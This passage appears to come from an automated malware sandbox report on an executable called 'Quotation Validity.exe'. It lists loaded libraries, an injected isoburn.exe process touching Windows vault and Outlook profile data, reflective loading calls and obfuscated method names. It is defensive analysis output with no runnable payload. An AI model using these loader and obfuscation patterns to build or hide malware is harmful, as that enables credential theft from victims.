                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Quotation Validity.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Quotation Validity.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Quotation Validity.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: isoburn.pdb source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730617348.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: isoburn.pdbGCTL source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730617348.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KnETAajUsFuuTQ.exe, 0000000B.00000002.3724874512.000000000056E000.00000002.00000001.01000000.0000000C.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771056364.000000000056E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Quotation Validity.exe, 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1699007606.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1706016321.0000000004C84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Quotation Validity.exe, Quotation Validity.exe, 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000C.00000003.1699007606.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1706016321.0000000004C84000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.cs.Net Code: FO2u76E0uu System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.cs.Net Code: FO2u76E0uu System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078AC1EF push 0000005Dh; ret 2_2_078AC19A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004148DC pushad ; retf 9_2_004148E4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004032C0 push eax; ret 9_2_004032C2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00426AB3 push es; retf 9_2_00426B5B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00418ABC push ebx; ret 9_2_00418ABD
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00413BE9 push 00000025h; iretd 9_2_00413BF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00417C83 push edx; retf 9_2_00417CC2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00417D07 push edx; retf 9_2_00417CC2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00401DE9 pushad ; retf 9_2_00401E17
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00404E1D push 2A89E27Eh; ret 9_2_00404E25
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00415625 push ebp; retf 9_2_00415626
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00404F61 push ss; ret 9_2_00404F62
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013709AD push ecx; mov dword ptr [esp], ecx9_2_013709B6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E609AD push ecx; mov dword ptr [esp], ecx12_2_04E609B6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A603EA push EBE9D31Fh; retf 12_2_02A60403
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A51619 pushad ; retf 12_2_02A51621
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A637F0 push es; retf 12_2_02A63898
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A557F9 push ebx; ret 12_2_02A557FA
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A60406 pushfd ; iretd 12_2_02A60407
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A5745E push ebx; ret 12_2_02A5745F
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A54A44 push edx; retf 12_2_02A549FF
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A41B5A push 2A89E27Eh; ret 12_2_02A41B62
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A57887 push cs; retf 12_2_02A57888
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A5D985 push edi; iretd 12_2_02A5D987
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A549C0 push edx; retf 12_2_02A549FF
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A609C9 push esp; retf 12_2_02A609CA
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A50926 push 00000025h; iretd 12_2_02A5092D
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A63C90 push edi; iretd 12_2_02A63DB5
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A41C9E push ss; ret 12_2_02A41C9F
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A55DB1 push ds; retf 12_2_02A55DB4
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A55D73 push 00000035h; iretd 12_2_02A55D7E
                      Source: Quotation Validity.exeStatic PE information: section name: .text entropy: 7.844873716049532
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, kYw2t6Cujk8r0xkKn5A.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QFc4LHkEsY', 'X0W4h5rrRu', 'R7W4koqfUj', 'feu44ynFoc', 'hac4tKk2LM', 'daZ4mT9FNL', 'DwK4DpbMXZ'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, h5HxGKUEXWrqmUk5Dl.csHigh entropy of concatenated method names: 'zNZvlgPQfO', 'UCRvyCZZfX', 'U7Ov7pD7Mu', 'rhEvQ6XISq', 'x03vN3Su7F', 'J8dv6mx1dv', 'mRevquXOv8', 'H77vsQrkME', 'bpWv5Ymbel', 'XuQvA825f9'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, I257RiJPIrWR2xy1FE.csHigh entropy of concatenated method names: 'ToString', 'MLeExCwhif', 'EuWEZe4qLP', 'U4vE8KRHj2', 'SdTEg45lLb', 'LYLEiAs9gc', 'YUYErR0Yat', 'tjrEPx8dfU', 'sycEcRc19E', 'H91EU2gQ79'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, Od6YwxKt7YrNrBL1cF.csHigh entropy of concatenated method names: 'RjiVjNP2qo', 'RavVpu1P5n', 'tK41F1uMKl', 'yFU1CWbEvA', 'cJQVxMXlBm', 'IobVOFgjVa', 'j3CVSWIuTO', 'y7gVeZr9uV', 'vZ4VBt17qX', 'nSUVJrCrEY'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, amviEfW6dl31nSNBN7.csHigh entropy of concatenated method names: 'WeT78Was3', 'lZWQBNIoA', 'iwm69PF2v', 'JuRqPgjtO', 'SYO5mseMy', 'nRLAmCEm4', 'WhjrinmLAoNEkgemqe', 'tmOur6YFagY79lsRcx', 'Q0B19wNtX', 'q3ahuIedI'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, t5MOqWCFf9eOYvjVC8u.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RVVhxGPv6X', 'L5hhOZvROp', 'FZrhSIhTOB', 'RIXhe8RJtO', 'OYohBZVQXX', 'LoghJiUPqa', 'Vs3haRuO67'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.csHigh entropy of concatenated method names: 'PaGofPJ7f2', 'pPXoYV4bkg', 'qNRoGq0Ci4', 'e7jonVI7Yj', 'iC5oMZY7iE', 'hOto3htoaL', 'HR8ovVRQnL', 'uDioX07isj', 'yFwowbIvDV', 'YCioIQI1SJ'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, YANjrvzfk5eqILVaI9.csHigh entropy of concatenated method names: 'qiKh6GodFu', 'Oplhsgr9Qf', 'QWNh5Cxwe0', 'YS4h22yIN8', 'bjDhZeiKBu', 'HBBhg5hJQA', 'VyshiVqmho', 'yIDhDwCu4u', 'ecQhlTyT2p', 'nk4hyt80aZ'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, pvnc8JpnNdIMnHG5MX.csHigh entropy of concatenated method names: 'C79hnAqjuM', 'ThuhMFFuDu', 'Ypvh3FLmOh', 'xGshvRZf9i', 'i7fhLoJTKd', 'svwhX64cVa', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, lZXfE1AcaEeNcwwM7x.csHigh entropy of concatenated method names: 'yDfMN8Y8K8', 'FkIMqn3dux', 'idFn8NDaq2', 'tntngXVK8v', 'Hpqni6OZq1', 'JyYnr74Vdj', 'VgOnPCMiAw', 'nRgncvHsGR', 'b12nUT9Yjy', 'KLXnTBTiD8'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, urntG10VLDyIdTfQDm.csHigh entropy of concatenated method names: 'iTaL2dgatw', 'iIlLZjRrth', 'cLhL8VukWU', 'SFwLgPXMik', 'oOCLiZGFfF', 'pveLrWhtCr', 'FI8LPfEO7C', 'xPZLc3ETH6', 'GpFLUiJHco', 'HlTLTorFVZ'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, KnnK8XSCKvQEo4K9Uf.csHigh entropy of concatenated method names: 'qmyHsYjqKP', 'T1NH5yjl7X', 'WaZH2wlkxo', 'sgWHZqN6uf', 'DTqHgHoRyS', 'RA5HicLrjL', 'esVHPkJOom', 'DXoHccn0oy', 'XLmHT4KUUy', 'ii1HxQGGVB'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, N5pa6mbrEKLlhI1c1D.csHigh entropy of concatenated method names: 'JVMLd1ryON', 'qCDLVP57qy', 'v51LLHRwrx', 'jh4Lk9fPZw', 'Sn6LtZXYRK', 'n9wLDyrx7m', 'Dispose', 'oRN1YCCLjh', 'nlh1GSDZjL', 'lYQ1nDalUY'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, nQxcW3u1CDaQqJLW6T.csHigh entropy of concatenated method names: 'rtGCvaISc3', 'vJkCXRod0a', 'hymCIvFFAB', 'n4DC9jwZXf', 'lwMCd7x3To', 'TGFCElARYK', 'AQgAG07txruFsR6mn8', 'gfRhVbPVT7VDnLVSVy', 'aypCCMfXi0', 'pm8CoR3VLo'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, iToaGF2lARYKayyNlK.csHigh entropy of concatenated method names: 'BLf3fRLKrY', 'rk33GHQqXB', 'kWp3MpuHyw', 'Kgc3v5G6h1', 'dVs3XVOGDX', 'FyHMRrJ7dK', 'NWpMK3g7ud', 'suFMb8l04w', 'VjWMjrI4aQ', 'G9cM0a8p4x'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, gaISc3smJkRod0afuE.csHigh entropy of concatenated method names: 'wMqGe8EBRd', 'yalGBqfq3P', 'Fb4GJcP8Pk', 'jEnGaEsk6k', 'JLnGRCNQSi', 'QLBGKVtn2v', 'KfTGbp33eh', 'sWTGj2xd1R', 'M7cG0DTfcZ', 'MX8Gpkre3u'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, oN2grECCK4gO17L0FAy.csHigh entropy of concatenated method names: 'Rdthp9scwo', 'fc2hzZp0lF', 'VArkFCQrvj', 'Vp4kC5w2si', 'uKOkWYfLZA', 'c6ckoAxE0n', 'cm1ku6YXev', 'ysJkf1oQ3l', 'nsikYLIldq', 'sk1kGZWDep'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, VoqGq3ajNAWF6jOayP.csHigh entropy of concatenated method names: 'hrDVIyFPjI', 't9VV9UneKS', 'ToString', 'R2GVY7SvWQ', 'FcYVGZjn6E', 'sCRVnSBILr', 'oW6VMwRq0n', 'QPDV3Ptom8', 'GbYVvgFli6', 'IrfVXtFUF7'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, IfUyg8GCniJR50PisR.csHigh entropy of concatenated method names: 'Dispose', 'ULlC0hI1c1', 'A4pWZMI7ZP', 'tt6ZmUqLQ1', 'wy5Cpf7nZy', 'aMNCzaoUre', 'ProcessDialogKey', 'hTtWFrntG1', 'qLDWCyIdTf', 'ADmWWEvnc8'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, MNysO1PmBFCOrx1ULk.csHigh entropy of concatenated method names: 'I1XvYVLcQX', 'WBovn5K6wu', 'yAOv3vs632', 'tqf3ptcDhw', 'Hei3zQZvuq', 'PAVvFiFAyE', 'wY7vCh7uq1', 'vUqvWYudPq', 'pwBvobVpSL', 'orgvuul0VI'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, l8heFM5ymvFFABH4Dj.csHigh entropy of concatenated method names: 'kkLnQ72aow', 'BB0n6bBCUU', 'GU5nsvxkyY', 'bdWn5qD7QV', 'Vhjnd7ddQh', 'VhqnEheWRd', 'oISnVODh8i', 'qByn1JaLCu', 'CHRnLvHqvP', 'LP0nhmuyP1'
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, kYw2t6Cujk8r0xkKn5A.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QFc4LHkEsY', 'X0W4h5rrRu', 'R7W4koqfUj', 'feu44ynFoc', 'hac4tKk2LM', 'daZ4mT9FNL', 'DwK4DpbMXZ'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, h5HxGKUEXWrqmUk5Dl.csHigh entropy of concatenated method names: 'zNZvlgPQfO', 'UCRvyCZZfX', 'U7Ov7pD7Mu', 'rhEvQ6XISq', 'x03vN3Su7F', 'J8dv6mx1dv', 'mRevquXOv8', 'H77vsQrkME', 'bpWv5Ymbel', 'XuQvA825f9'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, I257RiJPIrWR2xy1FE.csHigh entropy of concatenated method names: 'ToString', 'MLeExCwhif', 'EuWEZe4qLP', 'U4vE8KRHj2', 'SdTEg45lLb', 'LYLEiAs9gc', 'YUYErR0Yat', 'tjrEPx8dfU', 'sycEcRc19E', 'H91EU2gQ79'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, Od6YwxKt7YrNrBL1cF.csHigh entropy of concatenated method names: 'RjiVjNP2qo', 'RavVpu1P5n', 'tK41F1uMKl', 'yFU1CWbEvA', 'cJQVxMXlBm', 'IobVOFgjVa', 'j3CVSWIuTO', 'y7gVeZr9uV', 'vZ4VBt17qX', 'nSUVJrCrEY'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, amviEfW6dl31nSNBN7.csHigh entropy of concatenated method names: 'WeT78Was3', 'lZWQBNIoA', 'iwm69PF2v', 'JuRqPgjtO', 'SYO5mseMy', 'nRLAmCEm4', 'WhjrinmLAoNEkgemqe', 'tmOur6YFagY79lsRcx', 'Q0B19wNtX', 'q3ahuIedI'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, t5MOqWCFf9eOYvjVC8u.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RVVhxGPv6X', 'L5hhOZvROp', 'FZrhSIhTOB', 'RIXhe8RJtO', 'OYohBZVQXX', 'LoghJiUPqa', 'Vs3haRuO67'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.csHigh entropy of concatenated method names: 'PaGofPJ7f2', 'pPXoYV4bkg', 'qNRoGq0Ci4', 'e7jonVI7Yj', 'iC5oMZY7iE', 'hOto3htoaL', 'HR8ovVRQnL', 'uDioX07isj', 'yFwowbIvDV', 'YCioIQI1SJ'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, YANjrvzfk5eqILVaI9.csHigh entropy of concatenated method names: 'qiKh6GodFu', 'Oplhsgr9Qf', 'QWNh5Cxwe0', 'YS4h22yIN8', 'bjDhZeiKBu', 'HBBhg5hJQA', 'VyshiVqmho', 'yIDhDwCu4u', 'ecQhlTyT2p', 'nk4hyt80aZ'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, pvnc8JpnNdIMnHG5MX.csHigh entropy of concatenated method names: 'C79hnAqjuM', 'ThuhMFFuDu', 'Ypvh3FLmOh', 'xGshvRZf9i', 'i7fhLoJTKd', 'svwhX64cVa', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, lZXfE1AcaEeNcwwM7x.csHigh entropy of concatenated method names: 'yDfMN8Y8K8', 'FkIMqn3dux', 'idFn8NDaq2', 'tntngXVK8v', 'Hpqni6OZq1', 'JyYnr74Vdj', 'VgOnPCMiAw', 'nRgncvHsGR', 'b12nUT9Yjy', 'KLXnTBTiD8'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, urntG10VLDyIdTfQDm.csHigh entropy of concatenated method names: 'iTaL2dgatw', 'iIlLZjRrth', 'cLhL8VukWU', 'SFwLgPXMik', 'oOCLiZGFfF', 'pveLrWhtCr', 'FI8LPfEO7C', 'xPZLc3ETH6', 'GpFLUiJHco', 'HlTLTorFVZ'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, KnnK8XSCKvQEo4K9Uf.csHigh entropy of concatenated method names: 'qmyHsYjqKP', 'T1NH5yjl7X', 'WaZH2wlkxo', 'sgWHZqN6uf', 'DTqHgHoRyS', 'RA5HicLrjL', 'esVHPkJOom', 'DXoHccn0oy', 'XLmHT4KUUy', 'ii1HxQGGVB'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, N5pa6mbrEKLlhI1c1D.csHigh entropy of concatenated method names: 'JVMLd1ryON', 'qCDLVP57qy', 'v51LLHRwrx', 'jh4Lk9fPZw', 'Sn6LtZXYRK', 'n9wLDyrx7m', 'Dispose', 'oRN1YCCLjh', 'nlh1GSDZjL', 'lYQ1nDalUY'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, nQxcW3u1CDaQqJLW6T.csHigh entropy of concatenated method names: 'rtGCvaISc3', 'vJkCXRod0a', 'hymCIvFFAB', 'n4DC9jwZXf', 'lwMCd7x3To', 'TGFCElARYK', 'AQgAG07txruFsR6mn8', 'gfRhVbPVT7VDnLVSVy', 'aypCCMfXi0', 'pm8CoR3VLo'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, iToaGF2lARYKayyNlK.csHigh entropy of concatenated method names: 'BLf3fRLKrY', 'rk33GHQqXB', 'kWp3MpuHyw', 'Kgc3v5G6h1', 'dVs3XVOGDX', 'FyHMRrJ7dK', 'NWpMK3g7ud', 'suFMb8l04w', 'VjWMjrI4aQ', 'G9cM0a8p4x'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, gaISc3smJkRod0afuE.csHigh entropy of concatenated method names: 'wMqGe8EBRd', 'yalGBqfq3P', 'Fb4GJcP8Pk', 'jEnGaEsk6k', 'JLnGRCNQSi', 'QLBGKVtn2v', 'KfTGbp33eh', 'sWTGj2xd1R', 'M7cG0DTfcZ', 'MX8Gpkre3u'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, oN2grECCK4gO17L0FAy.csHigh entropy of concatenated method names: 'Rdthp9scwo', 'fc2hzZp0lF', 'VArkFCQrvj', 'Vp4kC5w2si', 'uKOkWYfLZA', 'c6ckoAxE0n', 'cm1ku6YXev', 'ysJkf1oQ3l', 'nsikYLIldq', 'sk1kGZWDep'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, VoqGq3ajNAWF6jOayP.csHigh entropy of concatenated method names: 'hrDVIyFPjI', 't9VV9UneKS', 'ToString', 'R2GVY7SvWQ', 'FcYVGZjn6E', 'sCRVnSBILr', 'oW6VMwRq0n', 'QPDV3Ptom8', 'GbYVvgFli6', 'IrfVXtFUF7'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, IfUyg8GCniJR50PisR.csHigh entropy of concatenated method names: 'Dispose', 'ULlC0hI1c1', 'A4pWZMI7ZP', 'tt6ZmUqLQ1', 'wy5Cpf7nZy', 'aMNCzaoUre', 'ProcessDialogKey', 'hTtWFrntG1', 'qLDWCyIdTf', 'ADmWWEvnc8'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, MNysO1PmBFCOrx1ULk.csHigh entropy of concatenated method names: 'I1XvYVLcQX', 'WBovn5K6wu', 'yAOv3vs632', 'tqf3ptcDhw', 'Hei3zQZvuq', 'PAVvFiFAyE', 'wY7vCh7uq1', 'vUqvWYudPq', 'pwBvobVpSL', 'orgvuul0VI'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, l8heFM5ymvFFABH4Dj.csHigh entropy of concatenated method names: 'kkLnQ72aow', 'BB0n6bBCUU', 'GU5nsvxkyY', 'bdWn5qD7QV', 'Vhjnd7ddQh', 'VhqnEheWRd', 'oISnVODh8i', 'qByn1JaLCu', 'CHRnLvHqvP', 'LP0nhmuyP1'
